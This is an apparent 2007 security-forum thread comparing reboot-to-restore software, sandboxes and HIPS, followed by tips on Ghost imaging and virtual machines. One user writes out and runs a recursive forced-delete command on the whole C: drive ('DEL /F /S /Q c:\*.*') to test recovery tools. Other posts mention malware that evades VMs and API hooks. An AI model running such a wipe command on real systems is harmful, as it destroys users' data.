I think once this ideology becomes more prevalent in malware then any security tool that uses API hooking could be in trouble.
If you're interested in starting a process from kernel mode then I have further info." }-
Thanks, but .. over my head;D
I mean, if it were a document, with explanations and all that, maybe. But it seems to be a presentation where: 1- it lacks the presentation by the speaker, 2- it assumes that I know what they are talking about, i.e., he takes shortcuts from the beginning, assuming whoever is reading is already on top of things.
I hope others can comment on it.
lucas1985
May 18th, 2007, 04:56 PM
Hello Rich,
Reboot-to-restore software uses kernel drivers, right? If a kernel process can be started (don't know how) without prompts from the HIPS/whitelist, it may disable the kernel driver needed for the RTR (;D) software.
Do you remember our conversation about DeepFreeze? ;)
Rmus
May 18th, 2007, 05:02 PM
-{ Quote: "Do you remember our conversation about DeepFreeze? ;)" }-No, but you would have to demonstrate a working sample to convince me.
And, of course, how would such malware get onto my computer in the first place?
regards,
-rich
ErikAlbert
May 18th, 2007, 05:27 PM
-{ Quote: "Hello Lucas,
Anything that makes changes to the HD will be gone using a reboot-to-restore solution." }-
That's right.
Each infection has to CHANGE my harddisk to do something evil, that's their WEAKNESS and I use that weakness to kill them by removing the changes on my harddisk during each reboot. Simple but very efficient.
I wish that the change was stopped IMMEDIATELY and not during reboot, like Anti-Executable does, but that software doesn't exist yet. :)
lucas1985
May 18th, 2007, 05:45 PM
-{ Quote: "Each infection has to CHANGE my harddisk to do something evil, that's their WEAKNESS and I use that weakness to kill them by removing the changes on my harddisk during each reboot. Simple but very efficient." }-
We're talking about the possibility of malware executing without warnings from HIPS (Anti-Executable in your case) which could, for example, thaw your frozen snapshot, thus surviving the reboot.
At this moment, it's mostly a theoretical discussion with the possibility of some misunderstanding.
-{ Quote: "I wish that the change was stopped IMMEDIATELY and not during reboot, but that software doesn't exist yet. :) " }-
It's called Sandboxie ;D
ErikAlbert
May 18th, 2007, 05:48 PM
-{ Quote: "It's called Sandboxie ;D" }-
No that's NOT Sandboxie. It's a kind of Anti-Executable, but for ALL objects, not just executables.
lucas1985
May 18th, 2007, 06:04 PM
Well, it would be impossible to do anything. For example, the browser needs to write to the cache.
ErikAlbert
May 18th, 2007, 06:13 PM
-{ Quote: "Well, it would be impossible to do anything. For example, the browser needs to write to the cache." }-
You take it all too literally, it's ALL objects with exceptions, if absolutely necessary. I only want to avoid reboots and to have an immediate reaction, not a delayed reaction.
solcroft
May 18th, 2007, 06:45 PM
-{ Quote: "You take it all too literally, it's ALL objects with exceptions, if absolutely necessary. I only want to avoid reboots and to have an immediate reaction, not a delayed reaction." }-
Well, then you're contradicting yourself. AE PREVENTS malware from executing at all, while a reboot-to-restore solution lets the malware execute, and then undoes the changes it does. Rmus is correct, SandboxIE would be a much more similar solution to the one you're describing than AE-for-all.
Peter2150
May 18th, 2007, 06:57 PM
-{ Quote: "No that's NOT Sandboxie. It's a kind of Anti-Executable, but for ALL objects, not just executables." }-
Erik
You might want to look at SSM, or KAV PDM. Version 7.0 must be getting close, it is really looking good.
Pete
nicM
May 18th, 2007, 07:05 PM
-{ Quote: "
As long the damage is on the harddisk and nothing more than that, then isolation works, but not in your examples.
" }-
Exactly, I didn't know how to describe it, but your summary is fine: sandboxes can't help as soon as data stealing/remote data extraction is involved somehow.
There are some sandboxes which are taking care of that fact, for example I'm thinking about BufferZone's confidential folder (access forbidden for sandboxed processes), but it doesn't work for all data located outside the sandbox - programs wouldn't work sandboxed otherwise; with the LDpinch example again, I do not know any sandbox preventing the user's Windows licence serial from being read, and then possibly uploaded (:ouch: ).
As Rmus said, layered defense helps to mitigate damages (a good firewall to block outbound access/to block data upload, and why not process execution control, HIPS..), but in my example I only focused on the protection offered by the sandbox on its own.
ErikAlbert
May 18th, 2007, 07:56 PM
-{ Quote: "Well, then you're contradicting yourself. AE PREVENTS malware from executing at all, while a reboot-to-restore solution lets the malware execute, and then undoes the changes it does. Rmus is correct, SandboxIE would be a much more similar solution to the one you're describing than AE-for-all." }-
No I'm not contradicting myself, you just don't see the whole picture.
My boot-to-restore does more than just removing the mistakes of my security softwares. :)
Pedro
May 18th, 2007, 08:05 PM
-{ Quote: "Exactly, I didn't know how to describe it, but your summary is fine: sandboxes can't help as soon as data stealing/remote data extraction is involved somehow.
There are some sandboxes which are taking care of that fact, for example I'm thinking about BufferZone's confidential folder (access forbidden for sandboxed processes), but it doesn't work for all data located outside the sandbox - programs wouldn't work sandboxed otherwise; with the LDpinch example again, I do not know any sandbox preventing the user's Windows licence serial from being read, and then possibly uploaded (:ouch: ).
As Rmus said, layered defense helps to mitigate damages (a good firewall to block outbound access/to block data upload, and why not process execution control, HIPS..), but in my example I only focused on the protection offered by the sandbox on its own." }-
SandboxIE's closed file path too. You sound unfamiliar with SandboxIE ???
I thought you were thinking of XSS or similar problems with javascript, online accounts passwords, etc.
With the closed file path, sandboxed applications do not read my important files. Or do you find it not effective? (when testing)
nicM
May 20th, 2007, 12:16 PM
-{ Quote: "SandboxIE's closed file path too. You sound unfamiliar with SandboxIE ???" }-
Pedro, I just used Bufferzone as an example, I didn't say it was the only one to provide that kind of protection, about restricted zone/confidential folder.
I don't know how this protection is implemented in Sandboxie (yes, I'm quite unfamiliar with it), but here too I do not think it can prevent sandboxed processes from accessing system info like the XP serial number.
flinchlock
May 22nd, 2007, 01:47 PM
-{ Quote: "Why not download an evaluation version and run some tests! Old adage in one of my lines of work:
It's fine to ask for opinions and look at other's tests, but I don't think you will be satisfied until you prove for yourself what you are looking for :) " }-
I have not had time to download an evaluation version of AE.
But, I did do this: DEL /F /S /Q c:\*.*
It deleted a gazillion files (.exe, .dll, all).
I had to turn my PC off/on since the programs for reboot/shutdown were deleted.
My Partition Magic (MBR) menu came up just fine.
The FD-ISR (PBR) pre-boot menu came up just fine.
I chose "F1" and booted into my secondary snapshot just fine.
When I clicked on the systray FD-ISR icon, I got the error message: Can't open FirstDefense-ISR Manager.
I installed FD-ISR.
I clicked on the systray FD-ISR icon and it came up just fine.
I did a Copy/Update from Secondary -> Primary.
It replaced 34,596 missing files and 50 missing folders (4.26GB).
I rebooted into my Primary, and all is fine.
;D ;D ;D ;D ;D ;D
Mike
ErikAlbert
May 22nd, 2007, 02:03 PM
-{ Quote: "I have not had time to download an evaluation version of AE.
But, I did do this: DEL /F /S /Q c:\*.*
It deleted a gazillion files (.exe, .dll, all).
I had to turn my PC off/on since the programs for reboot/shutdown were deleted.
My Partition Magic (MBR) menu came up just fine.
The FD-ISR (PBR) pre-boot menu came up just fine.
I chose "F1" and booted into my secondary snapshot just fine.
When I clicked on the systray FD-ISR icon, I got the error message: Can't open FirstDefense-ISR Manager.
I installed FD-ISR.
I clicked on the systray FD-ISR icon and it came up just fine.
I did a Copy/Update from Secondary -> Primary.
It replaced 34,596 missing files and 50 missing folders (4.26GB).
I rebooted into my Primary, and all is fine.
;D ;D ;D ;D ;D ;D
Mike" }-
OK, but the bottom line is that PowerShadow didn't protect you against this disaster. From your description the same happened to me. Both my snapshots were restored, but the FDISR icon didn't work anymore, and that means that the restore wasn't successful.
When Anti-Executable is installed and HIGH security = ON and the setting "Delete Prevention" + "Copy Prevention" are both enabled, I wonder if it still would be a disaster. It might be possible that the restoration would be complete.
Unfortunately "Delete/Copy Prevention" = enabled are a pain for copy/update.
flinchlock
May 23rd, 2007, 08:39 AM
-{ Quote: "OK, but the bottom line is that PowerShadow didn't protect you against this disaster." }-I guess I caused some confusion on my part. The test I did, I only had FD-ISR installed. So, it only took me about 10 minutes to be back running again.
I just did that exact same test with PS 2.8.2 in single Shadow mode (system partition only).
It "looked" like it also deleted a gazillion files, but a simple Off/On with my power button, I was back running in less than 60 seconds. All those 34,000+ files were not really deleted.;D ;D :thumb: :thumb: ;D ;D
So, both FD-ISR and PS protected my system, except PS was about 10 times quicker!
Mike
UPDATE/FYI...
In case anyone wonders what "DEL /F /S /Q c:\*.*" does. Just go to a Command Prompt window, and type "del /?". The "/?" will display info about whatever command.
C:\TEMP>del /?
Deletes one or more files.
DEL [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
ERASE [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
  names         Specifies a list of one or more files or directories.
                Wildcards may be used to delete multiple files. If a
                directory is specified, all files within the directory
                will be deleted.
  /P            Prompts for confirmation before deleting each file.
  /F            Force deleting of read-only files.
  /S            Delete specified files from all subdirectories.
  /Q            Quiet mode, do not ask if ok to delete on global wildcard
  /A            Selects files to delete based on attributes
  attributes    R  Read-only files            S  System files
                H  Hidden files               A  Files ready for archiving
                -  Prefix meaning not
ErikAlbert
May 23rd, 2007, 04:19 PM
-{ Quote: "I guess I caused some confusion on my part. The test I did, I only had FD-ISR installed. So, it only took me about 10 minutes to be back running again.
I just did that exact same test with PS 2.8.2 in single Shadow mode (system partition only).
It "looked" like it also deleted a gazillion files, but a simple Off/On with my power button, I was back running in less than 60 seconds. All those 34,000+ files were not really deleted.;D ;D :thumb: :thumb: ;D ;D
So, both FD-ISR and PS both protected my system, except PS was about 10 times quicker!
" }-
1. FDISR didn't recover IMO, because you had to re-install FDISR in the first test.
2. PS did recover very well and very fast. FDISR was probably saved by PS in the second test.
flinchlock
May 23rd, 2007, 09:24 PM
-{ Quote: "1. FDISR didn't recover IMO, because you had to re-install FDISR in the first test." }-Well, of course you are right, but, it was still a lot quicker than a 30 minute Ghost image restore. Also, it was a very simple task to just reinstall FD-ISR.
-{ Quote: "2. PS did recover very well and very fast. FDISR was probably saved by PS in the second test." }-Yes and yes and yes
Mike
Franklin
May 23rd, 2007, 11:24 PM
-{ Quote: "Well, of course you are right, but, it was still a lot quicker than a 30 minute Ghost image restore.
Mike" }-
Can restore a ghost image in around a minute here. A thinned out XP Pro with my maintenance, needed exes and security apps are the only things on C.
Not trying to be a smart a#*, just showing what can be done.:)
EASTER.2010
May 24th, 2007, 01:13 AM
I cover any snapshot I happen to choose from my collection of (7) with the excellent protection of Power Shadow.
Kinda like ErikAlbert's famous boot-to-restore method ;D
Not had a single problem and don't expect any. I see nothing at all wrong with FD-ISR freezestorage.arx routine except it's considerably longer to carry out whereas with PS, it's reboot ONCE and everything flushed & restored like new again.
That takes only as long as it takes your PC to reboot. Ya gotta love entering Shadow-Mode on-the-fly. LoL
flinchlock
May 24th, 2007, 06:51 AM
-{ Quote: "Can restore a ghost image in around a minute here. A thinned out XP Pro with my maintenance, needed exes and security apps are the only things on C.
Not trying to be a smart a#*, just showing what can be done.:)" }-Please more details (probably in a new thread... please... please... *puppy* *puppy*
Is that your normal working image, or just a special emergency type image?
Mike
Franklin
May 24th, 2007, 08:25 AM
Don't think it warrants a new thread so just a quick rundown.
This 160 gig drive. Install XP Pro, Perfect Disk, Norton Ghost and Partition Magic on C.
Make 3 partitions which vary depending on the size of the disc.
C drive of 5 - 8 gig.
E drive of 20 gig for ghost images and D is around 130 gig for Virtual Machines, pics, music, flics and general crap.
After the partitions are made I defrag then make a ghost image.
Then I go about tweaking and slimming down XP using Bold Fortune's guide but I usually only delete the mainly larger useless folders or their contents.
Make another ghost image and then go about installing my other needed apps such as Ccleaner, Firefox, MS Office 2003 - Word, Excel and PPS, Sandboxie, Powershadow and a few other little apps that I find handy.
Defrag and make another ghost image.
At this stage the install of XP along my needed apps is around a gig of data and ghost images are around the 500 meg mark.
I also make an image every week or so but I always keep the first one of a fresh install of XP.
Also drop a clone of C and D on a partitioned slave drive and unhook it.
This is really just a brief summary of what I get up to, bit of work but great after it's set up.
As you can see from the pic below I have 18 ghost images on E and still have 10 gig of 20 free.
flinchlock
May 24th, 2007, 08:31 AM
What are your Ghost parameters? (Mine are "-fdsz -z1")
Do you exclude a 2,145,386,496 byte pagefile.sys?
Mike
Franklin
May 24th, 2007, 08:45 AM
With a gig of ddr I run with no paging without any slowdowns or probs.
I didn't think that Norton Ghost backed up the pagefile???
Ghost 2003 is used here.
flinchlock
May 24th, 2007, 08:53 AM
Here is my Ghost image... pagefile.sys.
I think I will try no pagefile since I have about 1.5GB of RAM.
I will PM you if I have any more Ghost questions before a MOD does a "fdisk /mbr" on us!
Thanks, Mike
Peter2150
May 24th, 2007, 09:06 AM
-{ Quote: "Here is my Ghost image... pagefile.sys.
I think I will try no pagefile since I have about 1.5GB of RAM.
I will PM you if I have any more Ghost questions before a MOD does a "fdisk /mbr" on us!
Thanks, Mike" }-
Start another thread in Software and services. Your questions and the answers could help others.
Pete
Franklin
May 24th, 2007, 09:09 AM
-{ Quote: "
I will PM you if I have any more Ghost questions before a MOD does a "fdisk /mbr" on us!
" }-
Yep, good idea Mike.;D
I have been thinking that if someone could come up with something like VM Player that could load ghost images into virtual environment and discard any changes at shutdown, now that would be something.
Way too complicated for me as I couldn't even work out Winhex to find those hidden lines.:-\
farmerlee
May 25th, 2007, 01:51 AM
-{ Quote: "Yep, good idea Mike.;D
I have been thinking that if someone could come up with something like VM Player that could load ghost images into virtual environment and discard any changes at shutdown, now that would be something.
Way too complicated for me as I couldn't even work out Winhex to find those hidden lines.:-\" }-
Well, you can use VMware Converter to copy your system to a VM which you can then run with VMware Player. However, I've found the free version of VMware Player doesn't allow you to revert changes made; only the paid version does, apparently.
Franklin
May 25th, 2007, 04:41 AM
Thanks for that farmerlee.
Using MS Virtual PC 2007 here. Got myself thinking about trying to restore a ghost image to a virtual machine.
Made a ghost backup CD and it booted within the virtual machine and seemed to do a restore as per normal.
Reboots into the "Start Windows Normally, Safemode... etc screen" and just sits there after hitting enter at any selection.
Tried the fixboot, fixmbr and chkdsk /r/f commands to no avail.
Booted with a BartPE disk and it seems all the XP files are in the virtual machine so I am probably missing something simple at this stage.
Even if I can't get it to boot it's a good learning experience.:wacko:
Come to think of it the virtual machine may use generic drivers so this could be the prob.:ouch:
Meriadoc
May 25th, 2007, 07:19 AM
VMWare and Ghost (http://www.vmware.com/pdf/p2v_thirdpartyimage.pdf)
edit : VMWare Converter may become of interest also.
Franklin
May 25th, 2007, 07:36 AM
Thanks for that Meriadoc and have saved the pdf for future reference.
Playing with MS Virtual PC 2007 ATM but have heard VMware is the way to go.
Well I finally got the restored ghost image to boot but I cheated.
Did a repair install with the XP CD with all my apps staying intact, but I still had to thin out XP, turn off services and redo tweaks.
Meriadoc
May 25th, 2007, 07:42 AM
Yep, Ghost and other Symantec products are compatible, and have been for a while.
cheated?
ErikAlbert
May 25th, 2007, 08:31 AM
-{ Quote: "
Playing with MS Virtual PC 2007 ATM but have heard VMware is the way to go.
" }-
If money is not a problem, VMware is indeed the way to go. :)
http://www.vmware.com/request_processor?nextPage=/vmwarestore/newstore/category_ace.jsp&action=CATALOG.GETGROUPS&application=store&fromACEPage=true&ProductGroupCodes=ACE2-ENT,ACE2-ALACARTE,ACE2-PIS,ACE2-MEDIAKIT
Peter2150
May 25th, 2007, 09:34 AM
-{ Quote: "If money is not a problem, VMware is indeed the way to go. :)
http://www.vmware.com/request_processor?nextPage=/vmwarestore/newstore/category_ace.jsp&action=CATALOG.GETGROUPS&application=store&fromACEPage=true&ProductGroupCodes=ACE2-ENT,ACE2-ALACARTE,ACE2-PIS,ACE2-MEDIAKIT" }-
I concur. VMware Workstation is very powerful.
Meriadoc
May 25th, 2007, 09:35 AM
Indeed a lot of money; if you scroll down a bit you'll find Workstation 6 + ACE Option Pack ($189), which is what I upgraded to at home.
flinchlock
May 25th, 2007, 09:49 AM
-{ Quote: "I concur. VMware Workstation is very powerful." }-I have no experience with VMware, but I read someplace in one of the 10,000,000 posts I have read (just this) month, something about some malware can detect a VM type setup, and not unload until running back in the real system. ???
Mike
farmerlee
May 25th, 2007, 10:51 AM
-{ Quote: "I have no experience with VMware, but I read someplace in one of the 10,000,000 posts I have read (just this) month, something about some malware can detect a VM type setup, and not unload until running back in the real system. ???
Mike" }-
From what I remember, certain malware can detect a VM and stay dormant until it gets onto a real system.
farmerlee
May 25th, 2007, 10:52 AM
-{ Quote: "Indeed a lot of money; if you scroll down a bit you'll find Workstation 6 + ACE Option Pack ($189), which is what I upgraded to at home." }-
Yikes, $189! I think I'll stick with Virtual PC for now :)
farmerlee
May 25th, 2007, 10:58 AM
-{ Quote: "Thanks for that farmerlee.
Using MS Virtual PC 2007 here. Got myself thinking about trying to restore a ghost image to a virtual machine.
Made a ghost backup CD and it booted within the virtual machine and seemed to do a restore as per normal.
Reboots into the "Start Windows Normally, Safemode... etc screen" and just sits there after hitting enter at any selection.
Tried the fixboot, fixmbr and chkdsk /r/f commands to no avail.
Booted with a BartPE disk and it seems all the XP files are in the virtual machine so I am probably missing something simple at this stage.
Even if I can't get it to boot it's a good learning experience.:wacko:
Come to think of it the virtual machine may use generic drivers so this could be the prob.:ouch:" }-
Yeah, I think one of the main problems with using an image in a VM is that the hardware emulated within the VM is usually different from the system that the image was taken from.
interact
May 25th, 2007, 11:40 AM
Malware authors can easily use code to make their code behave while running under a VM. Please see -> http://www.honeynet.org/papers/bots/botnet-code.html
There is a shorter technique to detect VMWare and Virtual PC but both are as effective.
~interact